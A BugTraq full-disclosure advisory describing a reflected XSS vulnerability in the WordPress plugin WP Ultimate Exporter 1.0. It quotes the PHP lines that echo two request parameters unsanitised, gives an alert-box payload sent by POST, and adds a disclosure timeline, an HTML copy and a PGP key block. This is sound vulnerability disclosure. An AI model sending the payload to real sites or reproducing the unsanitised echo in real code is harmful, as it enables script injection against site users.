BugTraq
WP Ultimate Exporter XSS Vulnerability Feb 24 2016 02:07PM
Rahul Pratap Singh (techno rps gmail com)
## FULL DISCLOSURE

#Product : WP Ultimate Exporter
#Exploit Author : Rahul Pratap Singh
#Version : 1.0
#Home page Link : https://wordpress.org/plugins/wp-ultimate-exporter/
#Website : 0x62626262.wordpress.com <http://0x62626262.wordpress.com/>
#Linkedin : https://in.linkedin.com/in/rahulpratapsingh94
#Date : 24/Feb/2016

XSS Vulnerability:

----------------------------------------
Description:
----------------------------------------
"export_name" and "export_post_type_name" parameters are not sanitized
that leads to Reflected XSS.

----------------------------------------
Vulnerable Code:
----------------------------------------
File Name: /wp-ultimate-exporter/includes/WUExporterUI.php

Found at line:88
$export_post_type = isset($_REQUEST['export_name']) ?
$_REQUEST['export_name'] : '' ;

Found at line:89
$custom_post = isset($_REQUEST['export_post_type_name']) ?
$_REQUEST['export_post_type_name'] : '' ;?>

Found at line:91

<input type ="hidden" value = '<?php echo $export_post_type?>'
name='export_type_name'>

Found at line:92

<input type ="hidden" value = '<?php echo $custom_post?>'
name='export_custompost_type'>

----------------------------------------
Exploit:
----------------------------------------
POST /wp-admin/admin.php?page=wp_ultimate_exporter&step=exportposttype

export_name="/><input type=text onclick=alert(/XSS/)><!--"

POST /wp-admin/admin.php?page=wp_ultimate_exporter&step=exportposttype

export_post_type_name="/><input type=text onclick=alert(/XSS/)><!--"

----------------------------------------
POC:
----------------------------------------
https://0x62626262.files.wordpress.com/2016/02/wp-ultimate-exporter.png?
w=1700
https://0x62626262.files.wordpress.com/2016/02/wp-ultimate-exporter1.png
?w=1700

Vulnerability Disclosure Timeline:
â?? January 30, 2016 â?? Bug discovered, initial report to WordPress
â?? February 1, 2016 â?? WordPress response, plugin taken down
â?? February 24, 2016 â?? Plugin up with same version

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.
<html>
<head>

<meta http-equiv="content-type" content="text/html; charset=utf-8">
</head>
<body text="#000000" bgcolor="#FFFFFF">
<div class="moz-text-html" lang="x-unicode">
<div data-mce-style="color: #3d596d; font-family: Merriweather,
Georgia, 'Times New Roman', Times, serif; font-size: 15px;
font-style: normal; font-variant: normal; font-weight: normal;
letter-spacing: normal; line-height: 25.5px; orphans: auto;
text-align: start; text-indent: 0; text-transform: none;
white-space: normal; widows: 1; word-spacing: 0;" style="color:
rgb(61, 89, 109); font-family: Merriweather, Georgia, 'Times New
Roman', Times, serif; font-size: 15px; font-style: normal;
font-variant: normal; font-weight: normal; letter-spacing:
normal; orphans: auto; text-align: start; text-indent: 0px;
text-transform: none; white-space: normal; widows: 1;
word-spacing: 0px; -webkit-text-stroke-width: 0px; line-height:
25.5px;">
<p style="margin: 0px;">## FULL DISCLOSURE</p>
</div>
<div data-mce-style="color: #3d596d; font-family: Merriweather,
Georgia, 'Times New Roman', Times, serif; font-size: 15px;
font-style: normal; font-variant: normal; font-weight: normal;
letter-spacing: normal; line-height: 25.5px; orphans: auto;
text-align: start; text-indent: 0; text-transform: none;
white-space: normal; widows: 1; word-spacing: 0;" style="color:
rgb(61, 89, 109); font-family: Merriweather, Georgia, 'Times New
Roman', Times, serif; font-size: 15px; font-style: normal;
font-variant: normal; font-weight: normal; letter-spacing:
normal; orphans: auto; text-align: start; text-indent: 0px;
text-transform: none; white-space: normal; widows: 1;
word-spacing: 0px; -webkit-text-stroke-width: 0px; line-height:
25.5px;"> <br>
</div>
<div data-mce-style="color: #3d596d; font-family: Merriweather,
Georgia, 'Times New Roman', Times, serif; font-size: 15px;
font-style: normal; font-variant: normal; font-weight: normal;
letter-spacing: normal; line-height: 25.5px; orphans: auto;
text-align: start; text-indent: 0; text-transform: none;
white-space: normal; widows: 1; word-spacing: 0;" style="color:
rgb(61, 89, 109); font-family: Merriweather, Georgia, 'Times New
Roman', Times, serif; font-size: 15px; font-style: normal;
font-variant: normal; font-weight: normal; letter-spacing:
normal; orphans: auto; text-align: start; text-indent: 0px;
text-transform: none; white-space: normal; widows: 1;
word-spacing: 0px; -webkit-text-stroke-width: 0px; line-height:
25.5px;">
<p style="margin: 0px 0px 24px;">#Product : WP Ultimate Exporter<br>
#Exploit Author : Rahul Pratap Singh<br>
#Version : 1.0<br>
#Home page Link : <a class="moz-txt-link-freetext"
href="https://wordpress.org/plugins/wp-ultimate-exporter/">https://wordp
ress.org/plugins/wp-ultimate-exporter/</a><br>
#Website : <a href="http://0x62626262.wordpress.com/"
data-mce-href="http://0x62626262.wordpress.com"
style="color: rgb(0, 170, 220);">0x62626262.wordpress.com</a><br>
#Linkedin : <a class="moz-txt-link-freetext"
href="https://in.linkedin.com/in/rahulpratapsingh94">https://in.linkedin
.com/in/rahulpratapsingh94</a><br>
#Date : 24/Feb/2016</p>
<p style="margin: 0px 0px 24px;">XSS Vulnerability:</p>
<p style="margin: 0px 0px 24px;">----------------------------------------<br>
Description:<br>
----------------------------------------<br>
"export_name" and "export_post_type_name" parameters are not
sanitized that leads to Reflected XSS.</p>
<p style="margin: 0px 0px 24px;">----------------------------------------<br>
Vulnerable Code:<br>
----------------------------------------<br>
File Name: /wp-ultimate-exporter/includes/WUExporterUI.php</p>
<div>Found at line:88<br>
$export_post_type = isset($_REQUEST['export_name']) ?
$_REQUEST['export_name'] : '' ;<br>
<br>
Found at line:89<br>
$custom_post = isset($_REQUEST['export_post_type_name']) ?
$_REQUEST['export_post_type_name'] : '' ;?></div>
<div> <br>
</div>
<div>Found at line:91</div>
<div>
<p style="margin: 0px;"><input type ="hidden" value =
'<?php echo $export_post_type?>'
name='export_type_name'><br>
<br>
</p>
</div>
<div>Found at line:92</div>
<div>
<p style="margin: 0px;"><input type ="hidden" value =
'<?php echo $custom_post?>'
name='export_custompost_type'><br>
<br>
</p>
</div>
<p style="margin: 0px 0px 24px;">----------------------------------------<br>
Exploit:<br>
----------------------------------------<br>
POST
/wp-admin/admin.php?page=wp_ultimate_exporter&step=exportposttype</p
>
<p style="margin: 0px 0px 24px;">export_name="/><input
type=text onclick=alert(/XSS/)><!--"</p>
<p style="margin: 0px 0px 24px;">POST
/wp-admin/admin.php?page=wp_ultimate_exporter&step=exportposttype</p
>
<p style="margin: 0px 0px 24px;">export_post_type_name="/><input

type=text onclick=alert(/XSS/)><!--"</p>
<p style="margin: 0px 0px 24px;">----------------------------------------<br>
POC:<br>
----------------------------------------<br>
<a class="moz-txt-link-freetext"
href="https://0x62626262.files.wordpress.com/2016/02/wp-ultimate-exporte
r.png?w=1700">https://0x62626262.files.wordpress.com/2016/02/wp-ultimate
-exporter.png?w=1700</a><br>
<a class="moz-txt-link-freetext"
href="https://0x62626262.files.wordpress.com/2016/02/wp-ultimate-exporte
r1.png?w=1700">https://0x62626262.files.wordpress.com/2016/02/wp-ultimat
e-exporter1.png?w=1700</a><br>
</p>
<p style="margin: 0px;">Vulnerability Disclosure Timeline:<br>
â?? January  30, 2016   â?? Bug discovered, initial report
to WordPress<br>
â?? February 1,  2016   â?? WordPress response, plugin taken down<br>
â?? February 24, 2016  â?? Plugin up with same version<br>
<br>
</p>
</div>
<div data-mce-style="font-family: Merriweather, Georgia, 'Times
New Roman', Times, serif; font-size: 15px; font-style: italic;
font-variant: normal; font-weight: normal;" style="color:
rgb(61, 89, 109); font-family: Merriweather, Georgia, 'Times New
Roman', Times, serif; font-size: 15px; font-variant: normal;
font-weight: normal; letter-spacing: normal; line-height:
20.4px; orphans: auto; text-align: start; text-indent: 0px;
text-transform: none; white-space: normal; widows: 1;
word-spacing: 0px; -webkit-text-stroke-width: 0px; font-style:
italic;">[+] Disclaimer<br>
Permission is hereby granted for the redistribution of this
advisory,<br>
provided that it is not altered except by reformatting it, and
that due<br>
credit is given. Permission is explicitly given for insertion in<br>
vulnerability databases and similar, provided that due credit is
given to<br>
the author.<br>
The author is not responsible for any misuse of the information
contained<br>
herein and prohibits any malicious use of all security related
information<br>
or exploits by the author or elsewhere.</div>
</div>
</body>
</html>
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: GnuPG v2.0.22 (GNU/Linux)

mQINBFYHqawBEAC3Mjyw1EiwhUNqaLqXqG2vTJMOwjqxwa3DAjPvO00BsytPB44L
QxGFx8tmkNcY/9D85cm6ZXfGzvMWVQqO47BTrRp2du3P+cXOtS+/MdM0ARy6dql8
Nlyuy4quuovD+1OOxVGU14Irl8WcmuwVY6eoYbVyRRNoSvo8gtUc4eGuDcIFS5KD
gnn2yGrU39oWe8s27Zqcuwmnt3P0qJrp6YhhDPrrm41v4akYSkAMAFnx5V+lgwJY
OrNBhSgvhPK4O9iHVER1YNPXQKWjOMkt+WRN4vbrzETSRiLt+v0vPPc7t6Ocp9td
if2NdShBiI54mZ+4iQQeLGCAopwCrcLcA5IBhT+XOXoQnXmQ0k5+CtunTrk2cB99
VDd+7d3bk/ajnMv2IVSPF9fPb6n0aSuoUu6hQ5Ig/SqorpRCsKXiaryb1UDPtrRE
/mvbAisqmbmQX8o3oMrQyRuDp4eHydWwFEUk+Rq42azBoTbE8o/3SjJ1G56mTDBr
i4Z8ZydrijPw01+2R++GfALvnguEptja7fAi10H3YYu3AqckcdcZig7Zu9Utp+Xj
kFGh8LVMJFd8YFBYXUp877tFJVhL4N3Nw0Q2zkAMEpAZTt7e9YVrqoxWLAnae+pT
wT3F0UMo+JkUhtYnHnTdGr5GDQGv4lJHkfF3MmFPPXlKyDQ+PUrOfD1bbQARAQAB
tClSYWh1bCBQcmF0YXAgU2luZ2ggPHRlY2huby5ycHNAZ21haWwuY29tPokCPgQT
AQIAKQUCVgeprAIbIwUJCWYBgAcLCQgHAwIBBhUIAgkKCwQWAgMBAh4BAheAAAoJ
EJvdRneaz31fDmsP+Lnr0/SS860E+VTP5GN8X6APuoFQI7iXlOg/8pvIKG1A9c02
1hBAN+5+sN3yRxo18rlHFPorszuR4eWrjXVo4TUlzjArHyTkDshg0bBiAtm3O4R0
CfwqC5Dp4/UuZ2GeX2duUob8SqpvkcAK/H+Ig88VDeR/vlDSIdq729KSB7aS6TyC
rohe79xPd03mvzOpBcmqQuQuV/6zCXjgn6yfOk9tf9dprDdM7jM+eimKdwXAAz1O
mebNXd6Q5SEOGq9SyESDAbKf6NtIrOIM7R1D9lNYF6PihZ4LyGLMzl7VN9ZbUcYj
p6IlQNn/K598CjubtFsc43Zt3Mw9uJJ/9f6+hVZBA1SwPQfMA9GbRfcBMt4Ufe8f
/CyqAhR1rzWFYoqfb42eA483cYSeFnChyXeUrddqNzXGVBSor+cNsxqkPyOlTu7B
ChBrb43Xh0HuxyA96mxEezgcMxFMc2OgPRdzqBo62HNKwlhBMLzkikVW9fd05IBA
c6fccQL25w12DXIwpJIHLlol8nTwy9FczyA3aVU2jHfvFPjILmg61AZi3VELpdtC
ydT52LwWhqRr/ctfX6W0pAzLHWBQapSuLjMk3TqtScU9XZaINHcXMXkCDAhZ/3mO
F15rKMj8ofSA253dMMzFaxID1Yq9j45o02+t2fp3bG0P4AOSR/pR4qalF5rR0A7Q
DAEQAAEBAAAAAAAAAAAAAAAA/9j/4AAQSkZJRgABAQAAAQABAAD/2wBDAAgGBgcG
BQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0aHBwgJC4nICIsIxwcKDcpLDAxNDQ0
Hyc5PTgyPC4zNDL/2wBDAQkJCQwLDBgNDRgyIRwhMjIyMjIyMjIyMjIyMjIyMjIy
MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjL/wAARCACHAIcDASIAAhEB
AxEB/8QAHwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL/8QAtRAAAgEDAwIE
AwUFBAQAAAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkK
FhcYGRolJicoKSo0NTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4
eXqDhIWGh4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW2t7i5usLDxMXGx8jJytLT
1NXW19jZ2uHi4+Tl5ufo6erx8vP09fb3+Pn6/8QAHwEAAwEBAQEBAQEBAQAAAAAA
AAECAwQFBgcICQoL/8QAtREAAgECBAQDBAcFBAQAAQJ3AAECAxEEBSExBhJBUQdh
cRMiMoEIFEKRobHBCSMzUvAVYnLRChYkNOEl8RcYGRomJygpKjU2Nzg5OkNERUZH
SElKU1RVVldYWVpjZGVmZ2hpanN0dXZ3eHl6goOEhYaHiImKkpOUlZaXmJmaoqOk
paanqKmqsrO0tba3uLm6wsPExcbHyMnK0tPU1dbX2Nna4uPk5ebn6Onq8vP09fb3
+Pn6/9oADAMBAAIRAxEAPwDYSwgTnZn3bmpsRoOqgegquZHb7zU3I9a806Cx5qL0
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
ayaZO7cgRA==
=eVjG
-----END PGP PUBLIC KEY BLOCK-----
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.22 (GNU/Linux)

iQIcBAEBAgAGBQJWzbkeAAoJEJvdRneaz31fgasP/1n86U5iFqXB0i3ZMMuPo7hf
Ry2bHY3g77durz0DqOJRTI8WieDTERyAncbQYjAv3PI8Zci4ed+zRV437heMlwuu
bn2x1DE55SzyuXkL2U/g/RKvMYQFrX7Mba2pyh7Z7chPeTwNXOkOTmHz8S/aZWnV
Azt6QC/3AY1jRcZb5trLQZkO19lT6dBIncYRRdfem0PZWSauTyZHcyQrwPpBdJab
jEIydyje14HPPVJbvkNzk5TbStFZjEIjWQ/X52W8KjhAPEDQ7MHbPuRUY2/IWMao
RFo4BggSONFiwumGR4USDyLk3JBM/Qt9V9h85OxZrg55pzSRom3SsiCSfDhfMdmX
7nr6oOGYSdmpA5MtjluQRrF0IRpK+SSnnyNwhw6Goca5kH3C7HYowgJo7wtFUVQR
74ynbJDwoWyPYrKriE1ABrYEWuUqdBFc0Er45hM6T0wmJbNZuX6WhFEcZUcTZrzK
VpiGY0l+c6xwY6oxSKcIniz/pLRZJDBRXdoSJG1S1CPz5SyFwI58vvW4aG7Nwq/y
uFLt55tujw8XLeo9HbbrsdxkwNWoLe743w5WHBEfxgoGEatnx2vKM8JrQPyVSO0z
A5VyjNH2Sz0emxp2YDeKtsAiUfV+KPi1Pg+OPdhoRYocvl6sBTA910JdfbgOjDsM
fvEX/e0ME3kuCGTxTp6b
=CHC5
-----END PGP SIGNATURE-----

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus